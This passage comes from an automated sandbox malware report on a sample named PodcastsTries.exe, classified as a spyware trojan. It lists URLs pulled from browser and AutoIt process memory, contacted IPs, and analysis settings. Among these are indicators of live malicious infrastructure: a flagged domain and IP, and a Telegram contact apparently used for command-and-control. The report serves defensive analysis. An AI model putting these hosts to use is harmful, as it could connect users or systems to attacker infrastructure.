                                                                                                                      		high
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icouechrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://issuetracker.google.com/255411748msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://anglebug.com/7246chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://anglebug.com/7369chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://anglebug.com/7489chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://chrome.google.com/webstorechrome.exe, 00000012.00000003.2722102002.00002780004C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2882165201.000026600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.3000415537.000074F40238C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://drive-daily-2.corp.google.com/manifest.json.27.drfalse
                                                                                                                                          		high
                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiHDJEU3.12.drfalse
                                                                                                                                            		high
                                                                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737269759.0000278001020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737330665.0000278001030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809303910.00002780002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738791399.0000278000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738731573.0000278000F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737386416.0000278000F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809977476.00002780004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737360460.0000278001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2738761959.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2737419840.000027800104C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 00000012.00000003.2769737177.000027800153C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769702296.0000278001534000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Kjchrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://t.me/k04aelm0nk3Mozilla/5.0Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.autoitscript.com/autoit3/XBillion.com, 0000000C.00000000.2151414811.0000000000205000.00000002.00000001.01000000.00000007.sdmp, Shipping.9.dr, Billion.com.2.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://chrome.google.com/webstore?hl=en3chrome.exe, 00000012.00000002.2812036983.0000278000A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://issuetracker.google.com/161903006msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.ecosia.org/newtab/Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, 16PP89.12.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://drive-daily-1.corp.google.com/manifest.json.27.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json.27.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://duckduckgo.com/favicon.icochrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000012.00000002.2809715374.000027800040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811516626.0000278000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810228742.0000278000544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3078chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/7553chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/5375chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ogs.googchrome.exe, 00000012.00000002.2808631973.00002780000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5371chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/4722chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://m.google.com/devicemanagement/data/apichrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/khchrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/7556chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://chromewebstore.google.com/chrome.exe, 00000012.00000002.2808273997.0000278000014000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2882165201.000026600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.3000415537.000074F40238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.27.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://drive-preprod.corp.google.com/manifest.json.27.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://msn.comXIDv10Cookies.28.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json0.27.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://clients4.google.com/chrome-syncchrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://drive-daily-3.corp.googlP7chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/6692chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://issuetracker.google.com/258207403msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://anglebug.com/3502chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/3623msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/3625msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://anglebug.com/3624msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://docs.google.com/presentation/Jchrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://t.mBillion.com, 0000000C.00000003.2540745906.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541000728.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540769406.0000000004128000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://anglebug.com/5007chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000012.00000002.2809376618.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735151718.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732621548.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736735650.0000278000358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          http://anglebug.com/3862chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            20.189.173.2
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            149.154.167.99
                                                                                                                                                                                                                                            		t.meUnited Kingdom
                                                                                                                                                                                                                                            		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                            162.159.61.3
                                                                                                                                                                                                                                            		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            23.44.203.82
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                            23.209.72.39
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                            142.250.181.68
                                                                                                                                                                                                                                            		www.google.comUnited States
                                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                                            20.110.205.119
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            188.245.216.205
                                                                                                                                                                                                                                            		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                            		16322PARSONLINETehran-IRANIRtrue
                                                                                                                                                                                                                                            204.79.197.219
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                            142.250.181.65
                                                                                                                                                                                                                                            		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                                            172.64.41.3
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            18.161.69.30
                                                                                                                                                                                                                                            		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                            		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                            18.238.49.124
                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                            		unknownReserved
                                                                                                                                                                                                                                            		unknownunknownfalse

                                                                                                                                                                                                                                            Private

                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                            192.168.2.6
                                                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                            Analysis ID:1580498
                                                                                                                                                                                                                                            Start date and time:2024-12-24 19:26:03 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 8m 8s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:41
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Sample name:PodcastsTries.exe
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@104/289@25/16
                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            • Number of executed functions: 81
                                                                                                                                                                                                                                            • Number of non-executed functions: 298
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
